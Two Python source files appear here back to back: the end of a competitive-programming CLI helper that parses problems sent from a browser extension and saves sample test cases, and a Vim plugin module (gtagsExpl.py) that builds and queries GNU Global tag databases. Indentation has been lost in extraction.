obj_template.template(file_path,file_name,parsingMode=True)
return
except Exception as e:
return
def rectify(self,s):
try:
i = s.find('{')
s = s[i:]
return s
except Exception as e:
return ''
def create(self,problem , cnt=0):
# print("here")
try :
problem = self.rectify(problem)
dic = json.loads(problem)
# cprint(dic,'yellow')
problem_name = dic['name']
try :
contest_name = dic['group']
except :
contest_name = 'NULL'
url = dic['url']
problem_timeLimit = 'NULL'
problem_memoryLimit = 'NULL'
try :
problem_timeLimit = str(dic['timeLimit']) + ' ms'
problem_memoryLimit = str(dic['memoryLimit']) + ' MB'
except Exception as e:
cprint(e,'red')
pass
# cprint(f'{problem_name} : {contest_name} : {url} ','cyan')
base = os.getcwd()
base_name = os.path.basename(base)
# cprint(f'{base_name}','cyan')
contest_path = os.path.join(base,contest_name)
# cprint(f'{contest_path}','yellow')
# cprint(f'cnt = {cnt}','yellow')
if base_name != contest_name and contest_name != 'NULL':
if cnt == 0:
if not os.path.isdir(contest_name):
os.mkdir(contest_name)
cprint(f" Folder {contest_name} is created.",'blue')
info = '{"contest_name" : "$CONTEST" , "url" : "$URL"}'
info = info.replace('$CONTEST',contest_name)
info = info.replace('$URL',url)
with open(os.path.join(contest_path,'.info'),'w') as f:
f.write(info)
cprint(f" All the problems will be parsed into '{contest_name}' folder.\n",'magenta')
os.chdir(contest_path)
# cprint(os.getcwd(),'red')
if not os.path.isdir(problem_name):
os.mkdir(problem_name)
# print("problem created")
info = '{"name" : "$NAME" , "url" : "$URL","timeLimit" : "$timeLimit" , "memoryLimit":"$memoryLimit"}'
info = info.replace('$NAME',problem_name)
info = info.replace('$URL',url)
info = info.replace('$memoryLimit',problem_memoryLimit)
info = info.replace('$timeLimit',problem_timeLimit)
path = os.path.join(os.getcwd(),problem_name,"")
# print(path)
with open(path+'.info','w') as f:
f.write(info)
if parse_problem_with_template:
self.template(path)
testcases = dic['tests']
# print(testcases)
# return
no = 1
if not os.path.isdir(path+"testcases"):
os.mkdir(path+"testcases")
path = os.path.join(path,'testcases')
for case in testcases:
# print(case)
fileName_in = 'Sample-'+str(no).zfill(2)+'.in'
fileName_out = 'Sample-'+str(no).zfill(2)+'.out'
# print(fileName_in)
no += 1
with open(os.path.join(path,fileName_in),'w') as fin:
fin.write(case['input'])
with open(os.path.join(path,fileName_out) ,'w') as fout:
fout.write(case['output'])
# cprint(result,'green')
# print(info)
cprint(f' {problem_name} fetched successfully.','green')
os.chdir(base)
except Exception as e:
cprint(e,'red')
cprint("Can't fetch.",'red')
def listen(self):
cprint(' '*17+'...Parsing Problem...'+' '*17,'blue')
print()
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind((self.HOST,self.PORT))
cprint(" Listening (Click competitive companion extension)....",'yellow')
print()
timeout = 60
cnt = 0
ok = True
while ok:
try :
s.listen()
s.settimeout(timeout)
timeout = 2
conn , addr = s.accept()
with conn:
# cprint("Connected...",'green')
problem_json = ''
while True:
data = conn.recv(1024)
result = (data.decode('utf-8'))
# result = self.rectify(result)
if not data :
# cprint(problem_json,'cyan')
if problem_json == '':
break
t = threading.Thread(target=self.create,args=(problem_json,cnt))
t.start()
cnt += 1
break
else:
problem_json += result
pass
except :
ok = False
print()
cprint(f' # Total {cnt} problems is fetched.','blue')
help_keys = ['-h','help']
def help():
"""All the available arguments are listed here"""
pt = '-'*18+"cp command arguments"+'-'*18
cprint(pt,'magenta')
print()
cprint(' -> parse : ','yellow',end='')
cprint('To parse problem or contest via competitive companion extension','cyan')
cprint(' -> listen : ','yellow',end='')
cprint('To parse problem or contest via competitive companion extension','cyan')
cprint(' -> test : ','yellow',end='')
cprint('To test code against testcases','cyan')
cprint(' -> add : ','yellow',end='')
cprint('To add testcase','cyan')
cprint(' -> brute : ','yellow',end='')
cprint('To bruteforce solution','cyan')
cprint(' -> gen : ','yellow',end='')
cprint('To generate tescase generator','cyan')
cprint(' -> setup : ','yellow',end='')
cprint('To generate sol.cpp , brute.cpp and tescase generator','cyan')
cprint(' -> -t "filename": ','yellow',end='')
cprint('To generate "filename" from template','cyan')
cprint(' -> login: ','yellow',end='')
cprint('To login into online judge','cyan')
cprint(' -> submit: ','yellow',end='')
cprint('To submit problem','cyan')
cprint(' -> problem : ','yellow',end='')
cprint('To parse problem manually','cyan')
cprint(' -> contest : ','yellow',end='')
cprint('To parse contest manually','cyan')
print()
cprint('-'*len(pt),'magenta')
def cp_manager(msg):
if 'parse' in msg or 'listen' in msg:
obj = Cp_ext()
obj.listen()
elif 'problem' in msg:
obj = Cp_Problem()
obj.fetch_problem()
elif 'submit' in msg:
msg = msg.replace('submit','')
msg = msg.replace(' ','')
obj = Cp_Submit()
obj.find_files(msg)
elif '-t' in msg or 'template' in msg:
msg = msg.replace('-t','')
msg = msg.replace('template','')
msg = msg.split()
if (len(msg)) == 0:
msg = 'sol.cpp'
else :
msg = msg[0]
obj = Cp_setup()
obj.template(file_name=msg)
elif 'contest' in msg:
obj = Cp_contest()
obj.parse_contest()
elif 'login' in msg:
obj = Cp_login()
obj.login()
elif 'add' in msg:
obj = Cp_add_test()
obj.add_case()
elif 'test -oj' in msg:
msg = msg.replace('test -oj','')
msg = msg.replace(' ','')
obj = Cp_Test()
obj.find_files(msg)
elif 'test' in msg:
msg = msg.replace('test','')
msg = msg.replace(' ','')
obj = Cp_my_tester()
# obj.TLE = 1
obj.find_files(msg)
elif 'setup' in msg:
obj = Cp_setup()
obj.setup()
elif 'brute' in msg:
obj = Cp_bruteforce()
obj.run()
elif 'gen' in msg:
obj = Cp_setup()
obj.gen_py()
elif if_run_type(msg):
pass
elif msg in help_keys:
help()
else :
cprint('Arguments Error','red')
help()
def if_cp_type(msg):
# print(msg)
for key in cp_keys:
if key in msg:
msg = msg.replace(key,'')
cp_manager(msg.lower())
return True
return False
if __name__ == "__main__":
# obj = Cp_Problem()
# Cp_Problem.fetch_problem()
# obj = Cp_Submit()
# obj.find_files()
# Cp_login.login()
obj = Cp_add_test()
obj.add_case()
# obj = Cp_Test()
# obj.find_files()
# cprint("Enter something for testing purpose : ",'cyan',end='')
# x = input()
# cprint(x,'blue')
|
gtagsExpl.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import vim
import re
import os
import os.path
import shutil
import itertools
import subprocess
from .utils import *
from .explorer import *
from .manager import *
if sys.version_info >= (3, 0):
import queue as Queue
else:
import Queue
#*****************************************************
# GtagsExplorer
#*****************************************************
class GtagsExplorer(Explorer):
def __init__(self):
self._executor = []
self._pattern_regex = []
if os.name == 'nt':
self._cd_option = '/d '
else:
self._cd_option = ''
self._root_markers = lfEval("g:Lf_RootMarkers")
self._db_location = os.path.join(lfEval("g:Lf_CacheDirectory"),
'.LfCache',
'gtags')
self._store_in_project = lfEval("get(g:, 'Lf_GtagsStoreInProject', 0)") == '1'
self._store_in_rootmarker = lfEval("get(g:, 'Lf_GtagsStoreInRootMarker', 0)") == '1'
self._project_root = ""
self._gtagslibpath = []
self._result_format = None
self._last_result_format = None
self._evalVimVar()
self._has_nvim = lfEval("has('nvim')") == '1'
self._db_timestamp = 0
self._last_command = ""
self._content = []
self._task_queue = Queue.Queue()
self._worker_thread = threading.Thread(target=self._processTask)
self._worker_thread.daemon = True
self._worker_thread.start()
def __del__(self):
self._task_queue.put(None)
self._worker_thread.join()
def _processTask(self):
while True:
try:
task = self._task_queue.get()
if task is None:
break
task()
except Exception as e:
print(e)
def setContent(self, content):
if self._last_command == "--all":
self._content = content
def getContent(self, *args, **kwargs):
arguments_dict = kwargs.get("arguments", {})
if "--recall" in arguments_dict:
return []
if vim.current.buffer.name:
filename = os.path.normpath(lfDecode(vim.current.buffer.name))
else:
filename = os.path.join(os.getcwd(), 'no_name')
if "--gtagsconf" in arguments_dict:
self._gtagsconf = arguments_dict["--gtagsconf"][0]
if "--gtagslabel" in arguments_dict:
self._gtagslabel = arguments_dict["--gtagslabel"][0]
if self._gtagsconf == '' and os.name == 'nt':
self._gtagsconf = os.path.normpath(os.path.join(self._which("gtags.exe"), "..", "share", "gtags", "gtags.conf")).join('""')
if "--gtagslibpath" in arguments_dict:
self._gtagslibpath = [os.path.abspath(os.path.expanduser(p)) for p in arguments_dict["--gtagslibpath"]]
for i in self._gtagslibpath:
if not os.path.exists(i):
print("`%s` does not exist!" % i)
else:
self._gtagslibpath = []
if "--update" in arguments_dict:
self._evalVimVar()
if "--accept-dotfiles" in arguments_dict:
self._accept_dotfiles = "--accept-dotfiles "
if "--skip-unreadable" in arguments_dict:
self._skip_unreadable = "--skip-unreadable "
if "--skip-symlink" in arguments_dict:
skip_symlink = arguments_dict["--skip-symlink"]
self._skip_symlink = "--skip-symlink%s " % ('=' + skip_symlink[0] if skip_symlink else "")
self.updateGtags(filename, single_update=False, auto=False)
return
elif "--remove" in arguments_dict:
self._remove(filename)
return
if "--path-style" in arguments_dict:
path_style = "--path-style %s " % arguments_dict["--path-style"][0]
else:
path_style = ""
auto_jump = False
self._last_result_format = self._result_format
self._result_format = None
if "-d" in arguments_dict:
pattern = arguments_dict["-d"][0]
pattern_option = "-d -e %s " % pattern
if "--auto-jump" in arguments_dict:
auto_jump = True
elif "-r" in arguments_dict:
pattern = arguments_dict["-r"][0]
pattern_option = "-r -e %s " % pattern
if "--auto-jump" in arguments_dict:
auto_jump = True
elif "-s" in arguments_dict:
pattern = arguments_dict["-s"][0]
pattern_option = "-s -e %s " % pattern
elif "-g" in arguments_dict:
pattern = arguments_dict["-g"][0]
pattern_option = "-g -e %s " % pattern
elif "--by-context" in arguments_dict:
pattern = lfEval('expand("<cword>")')
pattern_option = '--from-here "%d:%s" %s ' % (vim.current.window.cursor[0], vim.current.buffer.name, pattern)
if "--auto-jump" in arguments_dict:
auto_jump = True
else:
if "--current-buffer" in arguments_dict:
pattern_option = '-f "%s" -q' % vim.current.buffer.name
elif "--all-buffers" in arguments_dict:
pattern_option = '-f "%s" -q' % '" "'.join(b.name for b in vim.buffers)
else: # '--all' or empty means the whole project
pattern_option = None
root, dbpath, exists = self._root_dbpath(filename)
if not filename.startswith(root):
libdb = os.path.join(dbpath, "GTAGSLIBPATH")
if os.path.exists(libdb):
with lfOpen(libdb, 'r', errors='ignore') as f:
for line in f:
tmp_root, tmp_dbpath = line.rstrip().split('\t', 1)
if filename.startswith(tmp_root):
root = tmp_root
dbpath = tmp_dbpath
break
if "--result" in arguments_dict:
self._result_format = arguments_dict["--result"][0]
else:
self._result_format = "ctags"
env = os.environ
env["GTAGSROOT"] = root
env["GTAGSDBPATH"] = dbpath
if pattern_option is None: # '--all' or empty means the whole project
cmd = 'global -P | global -L- -f {}--gtagslabel={} {}--color=never --result={}'.format(
'--gtagsconf %s ' % self._gtagsconf if self._gtagsconf else "",
self._gtagslabel, path_style, self._result_format)
else:
cmd = 'global {}--gtagslabel={} {} {}--color=never --result={}'.format(
'--gtagsconf %s ' % self._gtagsconf if self._gtagsconf else "",
self._gtagslabel, pattern_option, path_style, self._result_format)
if not self._isDBModified(os.path.join(dbpath, 'GTAGS')) and self._content:
return self._content
executor = AsyncExecutor()
self._executor.append(executor)
lfCmd("let g:Lf_Debug_GtagsCmd = '%s'" % escQuote(cmd))
self._last_command = "--all"
content = executor.execute(cmd, env=env, raise_except=False)
return content
if "-S" in arguments_dict:
scope = "--scope %s " % os.path.abspath(arguments_dict["-S"][0])
else:
scope = ""
if "--literal" in arguments_dict:
literal = "--literal "
else:
literal = ""
if "-i" in arguments_dict:
ignorecase = "-i "
else:
ignorecase = ""
if "--append" not in arguments_dict or self._last_result_format is not None:
self._pattern_regex = []
# build vim regex, which is used for highlighting
if ignorecase:
case_pattern = r'\c'
else:
case_pattern = r'\C'
if len(pattern) > 1 and (pattern[0] == pattern[-1] == '"' or pattern[0] == pattern[-1] == "'"):
p = pattern[1:-1]
else:
p = pattern
if literal:
if len(pattern) > 1 and pattern[0] == pattern[-1] == '"':
p = re.sub(r'\\(?!")', r'\\\\', p)
else:
p = p.replace('\\', r'\\')
self._pattern_regex.append(r'\V' + case_pattern + p)
else:
if "-g" not in arguments_dict:
vim_regex = self.translateRegex(case_pattern + p.join([r'\b', r'\b']))
vim_regex = vim_regex.replace('.', r'\w')
else:
vim_regex = self.translateRegex(case_pattern + p)
self._pattern_regex.append(vim_regex)
root, dbpath, exists = self._root_dbpath(filename)
env = os.environ
env["GTAGSROOT"] = root
env["GTAGSDBPATH"] = dbpath
cmd = 'global {}--gtagslabel={} {} {}{}{}{}--color=never --result=ctags-mod'.format(
'--gtagsconf %s ' % self._gtagsconf if self._gtagsconf else "",
self._gtagslabel, pattern_option, path_style, scope, literal, ignorecase)
executor = AsyncExecutor()
self._executor.append(executor)
lfCmd("let g:Lf_Debug_GtagsCmd = '%s'" % escQuote(cmd))
self._last_command = "others"
content = executor.execute(cmd, env=env)
libdb = os.path.join(dbpath, "GTAGSLIBPATH")
if os.path.exists(libdb):
with lfOpen(libdb, 'r', errors='ignore') as f:
for line in f:
root, dbpath = line.rstrip().split('\t', 1)
env = os.environ
env["GTAGSROOT"] = root
env["GTAGSDBPATH"] = dbpath
if path_style == "--path-style abslib ":
path_style = "--path-style absolute "
cmd = 'global {}--gtagslabel={} {} {}{}{}{}--color=never --result=ctags-mod -q'.format(
'--gtagsconf %s ' % self._gtagsconf if self._gtagsconf else "",
self._gtagslabel, pattern_option, path_style, scope, literal, ignorecase)
executor = AsyncExecutor()
self._executor.append(executor)
content += executor.execute(cmd, env=env)
if auto_jump:
first_two = list(itertools.islice(content, 2))
if len(first_two) == 1:
return first_two
else:
return content.join_left(first_two)
return content
def translateRegex(self, regex, is_perl=False):
"""
copied from RgExplorer
"""
vim_regex = regex
vim_regex = re.sub(r'([%@&])', r'\\\1', vim_regex)
# non-greedy pattern
vim_regex = re.sub(r'(?<!\\)\*\?', r'{-}', vim_regex)
vim_regex = re.sub(r'(?<!\\)\+\?', r'{-1,}', vim_regex)
vim_regex = re.sub(r'(?<!\\)\?\?', r'{-0,1}', vim_regex)
vim_regex = re.sub(r'(?<!\\)\{(.*?)\}\?', r'{-\1}', vim_regex)
if is_perl:
# *+, ++, ?+, {m,n}+ => *, +, ?, {m,n}
vim_regex = re.sub(r'(?<!\\)([*+?}])\+', r'\1', vim_regex)
# remove (?#....)
vim_regex = re.sub(r'\(\?#.*?\)', r'', vim_regex)
# (?=atom) => atom\@=
vim_regex = re.sub(r'\(\?=(.+?)\)', r'(\1)@=', vim_regex)
# (?!atom) => atom\@!
vim_regex = re.sub(r'\(\?!(.+?)\)', r'(\1)@!', vim_regex)
# (?<=atom) => atom\@<=
vim_regex = re.sub(r'\(\?<=(.+?)\)', r'(\1)@<=', vim_regex)
# (?<!atom) => atom\@<!
vim_regex = re.sub(r'\(\?<!(.+?)\)', r'(\1)@<!', vim_regex)
# (?>atom) => atom\@>
vim_regex = re.sub(r'\(\?>(.+?)\)', r'(\1)@>', vim_regex)
# this won't hurt although they are not the same
vim_regex = vim_regex.replace(r'\A', r'^')
vim_regex = vim_regex.replace(r'\z', r'$')
vim_regex = vim_regex.replace(r'\B', r'')
# word boundary
vim_regex = re.sub(r'\\b', r'(<|>)', vim_regex)
# case-insensitive
vim_regex = vim_regex.replace(r'(?i)', r'\c')
vim_regex = vim_regex.replace(r'(?-i)', r'\C')
# (?P<name>exp) => (exp)
vim_regex = re.sub(r'(?<=\()\?P<\w+>', r'', vim_regex)
# (?:exp) => %(exp)
vim_regex = re.sub(r'\(\?:(.+?)\)', r'%(\1)', vim_regex)
# \a bell (\x07)
# \f form feed (\x0C)
# \v vertical tab (\x0B)
vim_regex = vim_regex.replace(r'\a', r'%x07')
vim_regex = vim_regex.replace(r'\f', r'%x0C')
vim_regex = vim_regex.replace(r'\v', r'%x0B')
# \123 octal character code (up to three digits) (when enabled)
# \x7F hex character code (exactly two digits)
vim_regex = re.sub(r'\\(x[0-9A-Fa-f][0-9A-Fa-f])', r'%\1', vim_regex)
# \x{10FFFF} any hex character code corresponding to a Unicode code point
# \u007F hex character code (exactly four digits)
# \u{7F} any hex character code corresponding to a Unicode code point
# \U0000007F hex character code (exactly eight digits)
# \U{7F} any hex character code corresponding to a Unicode code point
vim_regex = re.sub(r'\\([uU])', r'%\1', vim_regex)
vim_regex = re.sub(r'\[\[:ascii:\]\]', r'[\\x00-\\x7F]', vim_regex)
vim_regex = re.sub(r'\[\[:word:\]\]', r'[0-9A-Za-z_]', vim_regex)
vim_regex = vim_regex.replace(r'[[:^alnum:]]', r'[^0-9A-Za-z]')
vim_regex = vim_regex.replace(r'[[:^alpha:]]', r'[^A-Za-z]')
vim_regex = vim_regex.replace(r'[[:^ascii:]]', r'[^\x00-\x7F]')
vim_regex = vim_regex.replace(r'[[:^blank:]]', r'[^\t ]')
vim_regex = vim_regex.replace(r'[[:^cntrl:]]', r'[^\x00-\x1F\x7F]')
vim_regex = vim_regex.replace(r'[[:^digit:]]', r'[^0-9]')
vim_regex = vim_regex.replace(r'[[:^graph:]]', r'[^!-~]')
vim_regex = vim_regex.replace(r'[[:^lower:]]', r'[^a-z]')
vim_regex = vim_regex.replace(r'[[:^print:]]', r'[^ -~]')
vim_regex = vim_regex.replace(r'[[:^punct:]]', r'[^!-/:-@\[-`{-~]')
vim_regex = vim_regex.replace(r'[[:^space:]]', r'[^\t\n\r ]')
vim_regex = vim_regex.replace(r'[[:^upper:]]', r'[^A-Z]')
vim_regex = vim_regex.replace(r'[[:^word:]]', r'[^0-9A-Za-z_]')
vim_regex = vim_regex.replace(r'[[:^xdigit:]]', r'[^0-9A-Fa-f]')
return r'\v' + vim_regex
def _nearestAncestor(self, markers, path):
"""
return the nearest ancestor path(including itself) of `path` that contains
one of files or directories in `markers`.
`markers` is a list of file or directory names.
"""
if os.name == 'nt':
# e.g. C:\\
root = os.path.splitdrive(os.path.abspath(path))[0] + os.sep
else:
root = '/'
path = os.path.abspath(path)
while path != root:
for name in markers:
if os.path.exists(os.path.join(path, name)):
return path
path = os.path.abspath(os.path.join(path, ".."))
for name in markers:
if os.path.exists(os.path.join(path, name)):
return path
return ""
def _isVersionControl(self, filename):
if self._project_root and filename.startswith(self._project_root):
return True
ancestor = self._nearestAncestor(self._root_markers, os.path.dirname(filename))
if ancestor:
self._project_root = ancestor
return True
else:
return False
def _generateDbpath(self, path):
if os.name == 'nt':
db_folder = re.sub(r'[\\/]', '_', path.replace(':\\', '_', 1))
else:
db_folder = path.replace('/', '_')
if self._store_in_project:
return path
elif self._store_in_rootmarker:
for name in self._root_markers:
if os.path.exists(os.path.join(path, name)):
return os.path.join(path, name, '.LfGtags')
# if not exist root marker, store in project
return os.path.join(path, '.LfGtags')
else:
return os.path.join(self._db_location, db_folder)
def _root_dbpath(self, filename):
"""
return the (root, dbpath, whether gtags exists)
"""
if self._project_root and filename.startswith(self._project_root):
root = self._project_root
else:
ancestor = self._nearestAncestor(self._root_markers, os.path.dirname(filename))
if ancestor:
self._project_root = ancestor
root = self._project_root
else:
ancestor = self._nearestAncestor(self._root_markers, os.getcwd())
if ancestor:
self._project_root = ancestor
root = self._project_root
else:
root = os.getcwd()
dbpath = self._generateDbpath(root)
return (root, dbpath, os.path.exists(os.path.join(dbpath, "GTAGS")))
def updateGtags(self, filename, single_update, auto):
self._task_queue.put(partial(self._update, filename, single_update, auto))
def _isDBModified(self, dbpath):
try:
if self._db_timestamp == os.path.getmtime(dbpath):
return False
else:
self._db_timestamp = os.path.getmtime(dbpath)
return True
except:
return True
def _remove(self, filename):
if filename == "":
return
root, dbpath, exists = self._root_dbpath(filename)
try:
lfCmd("echohl Question")
if self._store_in_project:
if lfEval('input("Are you sure you want to remove GTAGS files?[Ny] ")') in ["Y","y"]:
os.remove(os.path.join(dbpath, "GTAGS"))
os.remove(os.path.join(dbpath, "GPATH"))
os.remove(os.path.join(dbpath, "GRTAGS"))
if os.path.exists(os.path.join(dbpath, "GTAGSLIBPATH")):
os.remove(os.path.join(dbpath, "GTAGSLIBPATH"))
elif lfEval('input("Are you sure you want to remove directory `{}`?[Ny] ")'.format(lfEncode(dbpath.replace('\\', r'\\')))) in ["Y","y"]:
shutil.rmtree(dbpath)
lfCmd("redraw | echo 'Done!'")
except Exception as e:
lfPrintError(e)
finally:
lfCmd("echohl NONE")
def _update(self, filename, single_update, auto):
if filename == "":
return
if self._gtagsconf == '' and os.name == 'nt':
self._gtagsconf = os.path.normpath(os.path.join(self._which("gtags.exe"), "..", "share", "gtags", "gtags.conf")).join('""')
root, dbpath, exists = self._root_dbpath(filename)
if not filename.startswith(root):
# if self._has_nvim:
# vim.async_call(lfCmd, "let g:Lf_Debug_Gtags = '%s'" % escQuote(str((filename, root))))
# else:
# lfCmd("let g:Lf_Debug_Gtags = '%s'" % escQuote(str((filename, root))))
return
self._updateLibGtags(root, dbpath)
if single_update:
if exists:
cmd = 'cd {}"{}" && gtags {}{}{}{}--gtagslabel {} --single-update "{}" "{}"'.format(self._cd_option, root,
self._accept_dotfiles, self._skip_unreadable, self._skip_symlink,
'--gtagsconf %s ' % self._gtagsconf if self._gtagsconf else "",
self._gtagslabel, filename, dbpath)
env = os.environ
# env["GTAGSFORCECPP"] = "" # lead to issue #489
subprocess.Popen(cmd, shell=True, env=env)
elif not auto:
self._executeCmd(root, dbpath)
elif self._isVersionControl(filename):
if not exists:
self._executeCmd(root, dbpath)
def _updateLibGtags(self, root, dbpath):
if not self._gtagslibpath:
return
if not os.path.exists(dbpath):
os.makedirs(dbpath)
libpaths = ["%s\t%s\n" % (p, self._generateDbpath(p)) for p in self._gtagslibpath if os.path.exists(p) and p != root]
if libpaths:
libdb = os.path.join(dbpath, "GTAGSLIBPATH")
with lfOpen(libdb, 'w', errors='ignore') as f:
f.writelines(libpaths)
if self._gtagsconf == '' and os.name == 'nt':
self._gtagsconf = os.path.normpath(os.path.join(self._which("gtags.exe"), "..", "share", "gtags", "gtags.conf")).join('""')
env = os.environ
# env["GTAGSFORCECPP"] = "" # lead to issue #489
for path in self._gtagslibpath:
if not os.path.exists(path):
continue
libdbpath = self._generateDbpath(path)
if not os.path.exists(libdbpath):
os.makedirs(libdbpath)
cmd = 'cd {}"{}" && gtags -i {}{}{}{}--gtagslabel {} "{}"'.format(self._cd_option, path,
self._accept_dotfiles, self._skip_unreadable, self._skip_symlink,
'--gtagsconf %s ' % self._gtagsconf if self._gtagsconf else "",
self._gtagslabel, libdbpath)
subprocess.Popen(cmd, shell=True, env=env)
def _which(self, executable):
for p in os.environ["PATH"].split(";"):
if os.path.exists(os.path.join(p, executable)):
return p
return ""
def _evalVimVar(self):
"""
vim variables can not be accessed from a python thread,
so we should evaluate the value in advance.
"""
self._accept_dotfiles = "--accept-dotfiles " if lfEval("get(g:, 'Lf_GtagsAcceptDotfiles', '0')") == '1' else ""
self._skip_unreadable = "--skip-unreadable " if lfEval("get(g:, 'Lf_GtagsSkipUnreadable', '0')") == '1' else ""
self._skip_symlink = "--skip-symlink%s " % ('=' + lfEval("get(g:, 'Lf_GtagsSkipSymlink', '')")
if lfEval("get(g:, 'Lf_GtagsSkipSymlink', '')") != '' else "")
self._gtagsconf = lfEval("get(g:, 'Lf_Gtagsconf', '')")
if self._gtagsconf:
self._gtagsconf = self._gtagsconf.join('""')
self._gtagslabel = lfEval("get(g:, 'Lf_Gtagslabel', 'default')")
self._Lf_GtagsSource = int(lfEval("get(g:, 'Lf_GtagsSource', 0)"))
if self._Lf_GtagsSource not in [0, 1, 2]:
self._Lf_GtagsSource = 0
if self._Lf_GtagsSource != 1: # only using FileExplorer needs to evaluate the following variables
if self._Lf_GtagsSource == 2:
self._Lf_GtagsfilesCmd = lfEval("g:Lf_GtagsfilesCmd")
return
if lfEval("exists('g:Lf_ExternalCommand')") == '1':
self._Lf_ExternalCommand = lfEval("g:Lf_ExternalCommand")
return
else:
self._Lf_ExternalCommand = None
self._Lf_UseVersionControlTool = lfEval("g:Lf_UseVersionControlTool") == '1'
self._Lf_WildIgnore = lfEval("g:Lf_WildIgnore")
self._Lf_RecurseSubmodules = lfEval("get(g:, 'Lf_RecurseSubmodules', 0)") == '1'
if lfEval("exists('g:Lf_DefaultExternalTool')") == '1':
self._default_tool = {"rg": 0, "pt": 0, "ag": 0, "find": 0}
tool = lfEval("g:Lf_DefaultExternalTool")
if tool and lfEval("executable('%s')" % tool) == '0':
raise Exception("executable '%s' can not be found!" % tool)
self._default_tool[tool] = 1
else:
self._default_tool = {"rg": 1, "pt": 1, "ag": 1, "find": 1}
self._is_rg_executable = lfEval("executable('rg')") == '1'
self._Lf_ShowHidden = lfEval("g:Lf_ShowHidden") != '0'
self._Lf_FollowLinks = lfEval("g:Lf_FollowLinks") == '1'
self._is_pt_executable = lfEval("executable('pt')") == '1'
self._is_ag_executable = lfEval("executable('ag')") == '1'
self._is_find_executable = lfEval("executable('find')") == '1'
def _exists(self, path, dir):
"""
return True if `dir` exists in `path` or its ancestor path,
otherwise return False
"""
if os.name == 'nt':
# e.g. C:\\
root = os.path.splitdrive(os.path.abspath(path))[0] + os.sep
else:
root = '/'
while os.path.abspath(path) != root:
cur_dir = os.path.join(path, dir)
if os.path.exists(cur_dir) and os.path.isdir(cur_dir):
return True
path = os.path.join(path, "..")
cur_dir = os.path.join(path, dir)
if os.path.exists(cur_dir) and os.path.isdir(cur_dir):
return True
return False
def _buildCmd(self, dir, **kwargs):
"""
this function comes from FileExplorer
"""
# do not use external command if the encoding of `dir` is not ascii
if not isAscii(dir):
return None
if self._Lf_ExternalCommand:
return self._Lf_ExternalCommand.replace('"%s"', '%s') % dir.join('""')
arguments_dict = kwargs.get("arguments", {})
if self._Lf_UseVersionControlTool:
if self._exists(dir, ".git"):
wildignore = self._Lf_WildIgnore
if ".git" in wildignore.get("dir", []):
wildignore.get("dir", []).remove(".git")
if ".git" in wildignore.get("file", []):
wildignore.get("file", []).remove(".git")
ignore = ""
for i in wildignore.get("dir", []):
ignore += ' -x "%s"' % i
for i in wildignore.get("file", []):
ignore += ' -x "%s"' % i
if "--no-ignore" in arguments_dict:
no_ignore = ""
else:
no_ignore = "--exclude-standard"
if self._Lf_RecurseSubmodules:
recurse_submodules = "--recurse-submodules"
else:
recurse_submodules = ""
cmd = 'git ls-files %s "%s" && git ls-files --others %s %s "%s"' % (recurse_submodules, dir, no_ignore, ignore, dir)
return cmd
elif self._exists(dir, ".hg"):
wildignore = self._Lf_WildIgnore
if ".hg" in wildignore.get("dir", []):
wildignore.get("dir", []).remove(".hg")
if ".hg" in wildignore.get("file", []):
wildignore.get("file", []).remove(".hg")
ignore = ""
for i in wildignore.get("dir", []):
ignore += ' -X "%s"' % self._expandGlob("dir", i)
for i in wildignore.get("file", []):
ignore += ' -X "%s"' % self._expandGlob("file", i)
cmd = 'hg files %s "%s"' % (ignore, dir)
return cmd
default_tool = self._default_tool
if default_tool["rg"] and self._is_rg_executable:
wildignore = self._Lf_WildIgnore
if os.name == 'nt': # https://github.com/BurntSushi/ripgrep/issues/500
color = ""
ignore = ""
for i in wildignore.get("dir", []):
if self._Lf_ShowHidden or not i.startswith('.'): # rg does not show hidden files by default
ignore += ' -g "!%s"' % i
for i in wildignore.get("file", []):
if self._Lf_ShowHidden or not i.startswith('.'):
ignore += ' -g "!%s"' % i
else:
color = "--color never"
ignore = ""
for i in wildignore.get("dir", []):
if self._Lf_ShowHidden or not i.startswith('.'):
ignore += " -g '!%s'" % i
for i in wildignore.get("file", []):
if self._Lf_ShowHidden or not i.startswith('.'):
ignore += " -g '!%s'" % i
if self._Lf_FollowLinks:
followlinks = "-L"
else:
followlinks = ""
if self._Lf_ShowHidden:
show_hidden = "--hidden"
else:
show_hidden = ""
if "--no-ignore" in arguments_dict:
no_ignore = "--no-ignore"
else:
no_ignore = ""
if dir == '.':
cur_dir = ''
else:
cur_dir = '"%s"' % dir
cmd = 'rg --no-messages --files %s %s %s %s %s %s' % (color, ignore, followlinks, show_hidden, no_ignore, cur_dir)
elif default_tool["pt"] and self._is_pt_executable and os.name != 'nt': # there is bug on Windows
wildignore = self._Lf_WildIgnore
ignore = ""
for i in wildignore.get("dir", []):
if self._Lf_ShowHidden or not i.startswith('.'): # pt does not show hidden files by default
ignore += " --ignore=%s" % i
for i in wildignore.get("file", []):
if self._Lf_ShowHidden or not i.startswith('.'):
ignore += " --ignore=%s" % i
if self._Lf_FollowLinks:
followlinks = "-f"
else:
followlinks = ""
if self._Lf_ShowHidden:
show_hidden = "--hidden"
else:
show_hidden = ""
if "--no-ignore" in arguments_dict:
no_ignore = "-U"
else:
no_ignore = ""
cmd = 'pt --nocolor %s %s %s %s -g="" "%s"' % (ignore, followlinks, show_hidden, no_ignore, dir)
elif default_tool["ag"] and self._is_ag_executable and os.name != 'nt': # https://github.com/vim/vim/issues/3236
wildignore = self._Lf_WildIgnore
ignore = ""
for i in wildignore.get("dir", []):
if self._Lf_ShowHidden or not i.startswith('.'): # ag does not show hidden files by default
ignore += ' --ignore "%s"' % i
for i in wildignore.get("file", []):
if self._Lf_ShowHidden or not i.startswith('.'):
ignore += ' --ignore "%s"' % i
if self._Lf_FollowLinks:
followlinks = "-f"
else:
followlinks = ""
if self._Lf_ShowHidden:
show_hidden = "--hidden"
else:
show_hidden = ""
if "--no-ignore" in arguments_dict:
no_ignore = "-U"
else:
no_ignore = ""
cmd = 'ag --nocolor --silent %s %s %s %s -g "" "%s"' % (ignore, followlinks, show_hidden, no_ignore, dir)
elif default_tool["find"] and self._is_find_executable and os.name != 'nt':
wildignore = self._Lf_WildIgnore
ignore_dir = ""
for d in wildignore.get("dir", []):
ignore_dir += '-type d -name "%s" -prune -o ' % d
ignore_file = ""
for f in wildignore.get("file", []):
ignore_file += '-type f -name "%s" -o ' % f
if self._Lf_FollowLinks:
followlinks = "-L"
else:
followlinks = ""
if os.name == 'nt':
redir_err = ""
else:
